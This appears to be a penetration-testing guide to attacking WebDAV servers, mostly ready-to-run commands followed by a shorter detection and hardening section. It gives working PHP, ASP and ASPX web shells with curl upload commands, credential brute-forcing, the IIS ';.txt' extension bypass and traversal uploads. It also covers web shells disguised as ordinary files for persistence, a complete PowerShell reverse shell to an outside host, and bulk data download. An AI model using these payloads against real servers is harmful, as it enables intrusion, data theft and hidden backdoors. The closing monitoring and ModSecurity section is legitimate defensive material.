WebDAV Service Attacks and Exploitation
WebDAV exploitation techniques including HTTP method abuse, file upload attacks, IIS extension bypass vulnerabilities, and authenticated access exploitation.
Introduction
Web Distributed Authoring and Versioning (WebDAV) is an extension to the HTTP protocol that allows clients to perform remote web content authoring operations. Originally defined in RFC 4918, WebDAV enables users to collaboratively edit and manage files on remote web servers through HTTP.
WebDAV security concerns stem from several factors:
- File manipulation capabilities: Upload, modify, delete files remotely
- Authentication weaknesses: Often uses HTTP Basic Authentication
- Misconfigured permissions: Excessive write access to web directories
- Web shell deployment: Upload and execute malicious scripts
- IIS-specific vulnerabilities: Extension bypass and parsing flaws
- Default credentials: Common in appliances and embedded systems
Why WebDAV is a High-Value Target
WebDAV exploitation frequently leads to immediate web server compromise:
- Direct file upload: Write files to web-accessible directories
- Web shell deployment: Execute arbitrary code via uploaded scripts
- Sensitive file access: Read configuration files and source code
- Credential harvesting: Access stored passwords and API keys
- Lateral movement: Use web server as pivot point
- IIS vulnerabilities: Historical bypass techniques still effective
Common WebDAV deployments:
- SharePoint: Microsoft collaboration platform
- OwnCloud/Nextcloud: Open-source file sharing
- Apache mod_dav: Linux web server module
- IIS WebDAV: Windows web server feature
- Network storage: NAS devices with WebDAV support
Technical Background
WebDAV HTTP Methods
WebDAV extends standard HTTP with additional methods:
| Method | Purpose | Risk Level |
|---|---|---|
| PUT | Upload/create files | High |
| DELETE | Remove files | High |
| COPY | Duplicate files | Medium |
| MOVE | Rename/relocate files | Medium |
| MKCOL | Create collections (directories) | Medium |
| PROPFIND | Retrieve properties | Low |
| PROPPATCH | Modify properties | Low |
| LOCK | Lock resource | Low |
| UNLOCK | Unlock resource | Low |
| OPTIONS | List supported methods | Info |
WebDAV Properties
WebDAV uses XML for property management:
<?xml version="1.0"?>
<D:propfind xmlns:D="DAV:">
<D:prop>
<D:displayname/>
<D:getcontentlength/>
<D:getcontenttype/>
<D:creationdate/>
<D:getlastmodified/>
</D:prop>
</D:propfind>Authentication
WebDAV typically uses:
- HTTP Basic Authentication: Base64-encoded credentials
- Digest Authentication: MD5-hashed credentials
- NTLM Authentication: Windows integrated authentication
- Kerberos: Domain-based authentication
Common WebDAV Implementations
| Software | Platform | Default Port | Notes |
|---|---|---|---|
| IIS WebDAV | Windows | 80/443 | Vulnerable to extension bypass |
| Apache mod_dav | Linux | 80/443 | Requires authentication configuration |
| nginx ngx_http_dav | Linux | 80/443 | Minimal WebDAV support |
| SharePoint | Windows | 80/443 | Enterprise collaboration |
| OwnCloud | Linux/Windows | 80/443 | File sharing platform |
| SabreDAV | PHP | 80/443 | PHP WebDAV framework |
Enumeration
Detecting WebDAV
HTTP OPTIONS Method
# Check for WebDAV methods
curl -i -X OPTIONS http://10.10.11.45/
# Nmap WebDAV detection
nmap -p 80,443 --script http-webdav-scan 10.10.11.45
nmap -p 80,443 --script http-methods 10.10.11.45
# Check specific directory
curl -i -X OPTIONS http://10.10.11.45/webdav/WebDAV Indicators:
HTTP/1.1 200 OK
Allow: OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
DAV: 1, 2
MS-Author-Via: DAVPROPFIND Method
# Enumerate WebDAV directories
curl -i -X PROPFIND http://10.10.11.45/webdav/
# Using davtest
davtest -url http://10.10.11.45/webdav/
# Using Nmap
nmap -p 80 --script http-webdav-scan --script-args http-webdav-scan.root=/webdav/ 10.10.11.45Common WebDAV Paths
# Test common WebDAV directories
for dir in webdav dav files documents shares upload uploads; do
curl -i -X OPTIONS http://10.10.11.45/$dir/
done
# Common paths on IIS
curl -i -X OPTIONS http://10.10.11.45/_vti_bin/
curl -i -X OPTIONS http://10.10.11.45/_private/
# SharePoint paths
curl -i -X OPTIONS http://10.10.11.45/_layouts/
curl -i -X OPTIONS http://10.10.11.45/_vti_inf.htmlExploitation Techniques
Authentication Attacks
Test Anonymous Access
# Test unauthenticated access
curl -i -X PUT http://10.10.11.45/webdav/test.txt -d "test content"
curl -i -X OPTIONS http://10.10.11.45/webdav/
# Using cadaver
cadaver http://10.10.11.45/webdav/
# Press Enter for blank username/passwordBrute-Force Authentication
# Using Hydra
hydra -L users.txt -P passwords.txt 10.10.11.45 http-get /webdav/
# Using Medusa
medusa -h 10.10.11.45 -U users.txt -P passwords.txt -M http -m DIR:/webdav/
# Using Nmap
nmap -p 80 --script http-brute --script-args http-brute.path=/webdav/ 10.10.11.45
# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/http/http_login
msf6 auxiliary(scanner/http/http_login) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/http/http_login) > set AUTH_URI /webdav/
msf6 auxiliary(scanner/http/http_login) > set USER_FILE users.txt
msf6 auxiliary(scanner/http/http_login) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/http/http_login) > runCommon Default Credentials:
admin:adminroot:roottest:testwebdav:webdavuser:password
File Upload Attacks
Test File Upload Permissions
# Using davtest (automated testing)
davtest -url http://10.10.11.45/webdav/ -auth user:password
# Manual PUT test
curl -i -X PUT http://10.10.11.45/webdav/test.txt -d "test content" -u user:password
# Upload HTML file
curl -i -X PUT http://10.10.11.45/webdav/test.html -d "<html><body>Test</body></html>" -u user:password
# Verify upload
curl http://10.10.11.45/webdav/test.htmlWeb Shell Upload
PHP Web Shell:
# Simple PHP shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -i -X PUT http://10.10.11.45/webdav/shell.php --data-binary @shell.php -u user:password
# Access shell
curl "http://10.10.11.45/webdav/shell.php?cmd=whoami"
# Full-featured PHP shell
curl -i -X PUT http://10.10.11.45/webdav/shell.php --data-binary @/usr/share/webshells/php/php-reverse-shell.php -u user:passwordASP/ASPX Web Shell:
# ASP shell
echo '<% response.write(CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll()) %>' > shell.asp
curl -i -X PUT http://10.10.11.45/webdav/shell.asp --data-binary @shell.asp -u user:password
# ASPX shell
curl -i -X PUT http://10.10.11.45/webdav/shell.aspx --data-binary @/usr/share/webshells/aspx/cmdasp.aspx -u user:password
# Access ASP shell
curl "http://10.10.11.45/webdav/shell.asp?cmd=whoami"JSP Web Shell:
# JSP shell
curl -i -X PUT http://10.10.11.45/webdav/shell.jsp --data-binary @/usr/share/webshells/jsp/cmdjsp.jsp -u user:passwordUsing Cadaver
# Connect to WebDAV
cadaver http://10.10.11.45/webdav/
# Authentication
Username: user
Password: password
# Commands
dav:/webdav/> ls
dav:/webdav/> put shell.php
dav:/webdav/> get sensitive.txt
dav:/webdav/> mkcol uploads
dav:/webdav/> delete old_file.txt
dav:/webdav/> exitIIS WebDAV Vulnerabilities
IIS 5.x/6.0 Extension Bypass
IIS 5/6 has a vulnerability where adding ;.txt bypasses extension restrictions:
# Upload .txt file
echo '<%@ Page Language="C#" %><%=System.Diagnostics.Process.Start("cmd.exe","/c " + Request.QueryString["cmd"]).StandardOutput.ReadToEnd()%>' > shell.txt
curl -i -X PUT http://10.10.11.45/webdav/shell.txt --data-binary @shell.txt -u user:password
# Move/Copy with .asp extension + ;.txt bypass
curl -i -X MOVE http://10.10.11.45/webdav/shell.txt \
-H "Destination: http://10.10.11.45/webdav/shell.asp;.txt" \
-u user:password
# Alternative using COPY
curl -i -X COPY http://10.10.11.45/webdav/shell.txt \
-H "Destination: http://10.10.11.45/webdav/shell.asp;.txt" \
-u user:password
# Access the shell (IIS executes it as .asp)
curl "http://10.10.11.45/webdav/shell.asp;.txt?cmd=whoami"Alternative Extensions:
# These also work
shell.asp;.html
shell.asp;.jpg
shell.asp;.pngUsing Cadaver for IIS Bypass
cadaver http://10.10.11.45/
Username: user
Password: password
# Upload .txt file
dav:/> put shell.txt
Uploading shell.txt to `/shell.txt':
Progress: [=============================>] 100.0% of 195 bytes succeeded.
# Move with bypass extension
dav:/> move shell.txt shell.asp;.txt
Moving `/shell.txt' to `/shell.asp;.txt': succeeded.
# Verify
dav:/> ls
shell.asp;.txt
# Access via browser or curl
# http://10.10.11.45/shell.asp;.txt?cmd=whoamiAutomated IIS WebDAV Exploitation
# Using Metasploit
msfconsole
msf6 > use exploit/windows/iis/iis_webdav_upload_asp
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set RHOSTS 10.10.11.45
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpUsername user
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpPassword password
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set PATH /webdav/
msf6 exploit(windows/iis/iis_webdav_upload_asp) > exploitAdvanced Exploitation
Directory Traversal
# Attempt to write outside WebDAV directory
curl -i -X PUT "http://10.10.11.45/webdav/../shell.php" --data-binary @shell.php -u user:password
# Try various traversal techniques
curl -i -X PUT "http://10.10.11.45/webdav/..%2fshell.php" --data-binary @shell.php -u user:password
curl -i -X PUT "http://10.10.11.45/webdav/..%252fshell.php" --data-binary @shell.php -u user:passwordFile Overwrite Attack
# Overwrite index page
curl -i -X PUT http://10.10.11.45/webdav/index.html \
--data-binary @malicious.html \
-u user:password
# Overwrite configuration files (if permissions allow)
curl -i -X PUT http://10.10.11.45/webdav/../web.config \
--data-binary @web.config \
-u user:passwordLock Manipulation
# Lock a file
curl -i -X LOCK http://10.10.11.45/webdav/file.txt \
-H "Timeout: Infinite" \
-u user:password
# Unlock a file (DoS potential)
curl -i -X UNLOCK http://10.10.11.45/webdav/file.txt \
-H "Lock-Token: <opaquelocktoken:xxx>" \
-u user:passwordPost-Exploitation
Web Shell Access
# Simple command execution
curl "http://10.10.11.45/webdav/shell.php?cmd=whoami"
curl "http://10.10.11.45/webdav/shell.php?cmd=ipconfig"
# Multi-line output
curl "http://10.10.11.45/webdav/shell.php?cmd=dir+C:\\"
# Download sensitive files
curl "http://10.10.11.45/webdav/shell.php?cmd=type+C:\\inetpub\\wwwroot\\web.config"
# Reverse shell
# Start listener
nc -lvnp 4444
# Trigger reverse shell
curl "http://10.10.11.45/webdav/shell.php?cmd=powershell+-c+\$client=New-Object+System.Net.Sockets.TCPClient('10.10.14.5',4444);\$stream=\$client.GetStream();[byte[]]\$bytes=0..65535|%%{0};while((\$i=\$stream.Read(\$bytes,0,\$bytes.Length))+-ne+0){;\$data=(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i);\$sendback=(iex+\$data+2>&1+|+Out-String+);\$sendback2=\$sendback+'PS+'+(pwd).Path+'>';+\$sendbyte=([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()"Data Exfiltration
# Using cadaver to download files
cadaver http://10.10.11.45/webdav/ -u user -p password
dav:/webdav/> ls
dav:/webdav/> get database_backup.sql
dav:/webdav/> mget *.config
# Recursive download
wget -r --user=user --password=password http://10.10.11.45/webdav/
# Using curl for batch download
for file in $(curl -s -u user:password http://10.10.11.45/webdav/ | grep -oP '(?<=href=")[^"]+'); do
curl -u user:password -O "http://10.10.11.45/webdav/$file"
donePersistence
# Upload persistent web shell with obfuscation
curl -i -X PUT http://10.10.11.45/webdav/error.php \
--data-binary @persistent_shell.php \
-u user:password
# Upload to less obvious location
curl -i -X PUT http://10.10.11.45/webdav/images/logo.php \
--data-binary @shell.php \
-u user:password
# Backdoor in common file
curl -i -X PUT http://10.10.11.45/webdav/404.php \
--data-binary @shell.php \
-u user:passwordDetection and Defense
Monitoring WebDAV Activity
Apache Logs:
# Monitor for WebDAV methods
tail -f /var/log/apache2/access.log | grep -E "PUT|DELETE|COPY|MOVE|MKCOL"
# Detect file uploads
grep "PUT" /var/log/apache2/access.log | grep -E "\.php|\.asp|\.jsp"
# Failed authentication attempts
grep "401" /var/log/apache2/access.log | grep "webdav"IIS Logs:
# PowerShell log analysis
Get-Content C:\inetpub\logs\LogFiles\W3SVC1\*.log | Select-String "PUT|DELETE|MOVE|COPY"
# Detect shell uploads
Get-Content C:\inetpub\logs\LogFiles\W3SVC1\*.log | Select-String "shell|cmd|exec"Hardening WebDAV
Disable WebDAV if Not Needed
Apache:
# Disable mod_dav
sudo a2dismod dav
sudo a2dismod dav_fs
sudo systemctl restart apache2IIS:
# Disable WebDAV feature
Remove-WindowsFeature Web-DAV-Publishing
# Or via IIS Manager
# Server Manager → Remove Roles and Features → Web Server (IIS) → WebDAV PublishingRestrict WebDAV Methods
Apache (/etc/apache2/sites-available/webdav.conf):
<Directory /var/www/webdav>
# Allow only safe methods
<LimitExcept GET POST OPTIONS PROPFIND>
Require all denied
</LimitExcept>
# Block dangerous methods
<Limit PUT DELETE COPY MOVE MKCOL PROPPATCH LOCK UNLOCK>
Require all denied
</Limit>
</Directory>IIS (web.config):
<system.webServer>
<security>
<requestFiltering>
<verbs>
<remove verb="PUT" />
<remove verb="DELETE" />
<remove verb="COPY" />
<remove verb="MOVE" />
</verbs>
</requestFiltering>
</security>
</system.webServer>Implement Strong Authentication
Apache:
<Directory /var/www/webdav>
AuthType Digest
AuthName "WebDAV"
AuthDigestProvider file
AuthUserFile /etc/apache2/webdav.digest
Require valid-user
</Directory>Create digest password file:
sudo htdigest -c /etc/apache2/webdav.digest "WebDAV" usernameFile Type Restrictions
Apache:
<Directory /var/www/webdav>
# Block executable uploads
<FilesMatch "\.(php|php3|php4|php5|phtml|asp|aspx|jsp|exe|bat|sh)$">
Require all denied
</FilesMatch>
</Directory>IIS:
<system.webServer>
<security>
<requestFiltering>
<fileExtensions>
<add fileExtension=".asp" allowed="false" />
<add fileExtension=".aspx" allowed="false" />
<add fileExtension=".php" allowed="false" />
<add fileExtension=".exe" allowed="false" />
</fileExtensions>
</requestFiltering>
</security>
</system.webServer>Network Access Control
# Firewall rules - restrict WebDAV to internal network
sudo ufw allow from 10.10.10.0/24 to any port 80
sudo ufw deny from any to any port 80
# Apache IP restrictions
<Directory /var/www/webdav>
Require ip 10.10.10.0/24
Require ip 192.168.1.0/24
</Directory>Intrusion Detection
# ModSecurity rule for WebDAV methods
SecRule REQUEST_METHOD "@rx ^(PUT|DELETE|COPY|MOVE|MKCOL|PROPFIND|PROPPATCH|LOCK|UNLOCK)$" \
"id:1000,phase:1,deny,status:403,msg:'WebDAV method blocked'"
# Block common web shell patterns
SecRule REQUEST_FILENAME "@rx \.(php|asp|aspx|jsp)[^/]*$" \
"id:1001,phase:1,deny,status:403,msg:'Suspicious file upload blocked'"
# Detect shell.* uploads
SecRule REQUEST_FILENAME "@rx shell\." \
"id:1002,phase:1,deny,status:403,msg:'Shell upload detected'"References
Last updated on
SSH Service Attacks and Exploitation
Comprehensive SSH attack techniques including password brute-force, key-based attacks, tunneling, port forwarding, and session hijacking methods.
Security Techniques
Advanced offensive security techniques including Active Directory attacks, container exploitation, defense evasion, and Windows privilege escalation for red team operations.